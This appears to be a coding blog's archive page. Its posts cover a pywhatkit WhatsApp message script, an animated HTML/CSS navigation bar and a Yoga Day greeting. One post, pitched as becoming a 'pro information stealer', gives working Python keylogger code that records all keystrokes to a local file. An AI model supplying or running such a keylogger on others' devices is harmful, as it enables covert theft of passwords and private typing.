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Showing posts from June, 2021

Automate WhatsApp Messages With Just Two Lines Code Of Python | Pywhatkit | Coding With Roannie

  Automate WhatsApp Messages With Just Two Lines Code Of Python | Pywhatkit | Coding With Roannie SOURCE FOR YOU TUBE VIDEO PYTHON CODE WITH COMMENTS : import   pywhatkit pywhatkit . sendwhatmsg (  '+91 Number' ,  'hello' ,       9  , 3 )                                        #message      #time(Hour , Min)

Animated NavBar For Website Using HTML and CSS | Web Development | HTML | CSS | Coding With Roannie

  Animated NavBar For Website Using HTML and CSS | Web Development | HTML | CSS | Coding With Roannie SOURCE CODE YOU TUBE VIDEO HTML code : <! DOCTYPE   html > < html   lang = "en" > < head >     < meta   charset = "UTF-8" >     < meta   http-equiv = "X-UA-Compatible"   content = "IE=edge" >     < meta   name = "viewport"   content = "width=device-width, initial-scale=1.0" >     < title >Animated Nav Bar</ title >     < link   rel = "stylesheet"   href = "AnimatedNavBar.css" > </ head > < body  >     < nav >         < a   href = "" >             < span > </ span >             < span > </ span >             < span > </ span >             < span > </ span >             Home         </ a >         < a   href = "" >             < span > </ span

Make Simple Keylogger Using Python | Become a Pro Information Stealer | Python | Coding With Roannie

Make Simple Keylogger Using Python | Become a Pro Information Stealer | Python | Coding With Roannie   SOURCE CODE FOR YOUTUBE VIDEO from   pynput . keyboard   import  Listener def   log_keystroke ( key ):      key   =   str ( key ). replace ( "'" ,  "" )      if   key   ==   '' :          key   =   ' '      if   key   ==   'Key.shift_r' :          key   =   ''      if   key   ==   "Key.enter" :          key   =   ' \n '      with   open ( "log.txt" ,  'a' )  as  f:         f. write ( key ) with  Listener( on_press = log_keystroke )  as  l:     l.join()

Animated NavBar of Website Made Using HTML and CSS

Animated nav bar Home About Contact Us Pages Animated Nav bar In html Lorem ipsum dolor, sit amet consectetur adipisicing elit. Omnis quibusdam quas possimus delectus minus! Esse officia quasi corrupti nihil? Adipisci natus quasi iure architecto quis, deleniti, saepe facere, id ut officiis cumque quisquam? Corrupti doloribus iure placeat! Incidunt nihil adipisci et facilis, impedit quidem minus expedita, aliquid cum eveniet harum optio corrupti accusantium nobis delectus repudiandae illo molestiae voluptatibus ipsum, error consequuntur! Neque, maiores distinctio iusto ipsum iure quisquam soluta? Modi, unde? Fugiat


Happy Yoga Day to Your Friends This is Made by Vivek kumar ▅ ▆ ▇ █ HAPPY YOGA DAY █ ▇ ▆ ▅ “Yoga Day का ये शुभ अवसर आपके जीवन में अनेकों ख़ुशियाँ लेकर आए” इस Yoga Day हमारी शुभकामनाएँ आपके साथ हैं || Yoga Day की हार्दिक बधाई ||  Wishing you a very ✪ Happy Yoga Day ✪  to you and your lovely family  May this auspicious occasion of Yoga Day bring happiness, prosperity, health, and peace in your life.  ✪ I wish that this Yoga Day is your best one. ✪   यह संदेश Yoga Day तक सभी के मोबाइल में होना चाहिए यह आपका फर्ज हैं Share Share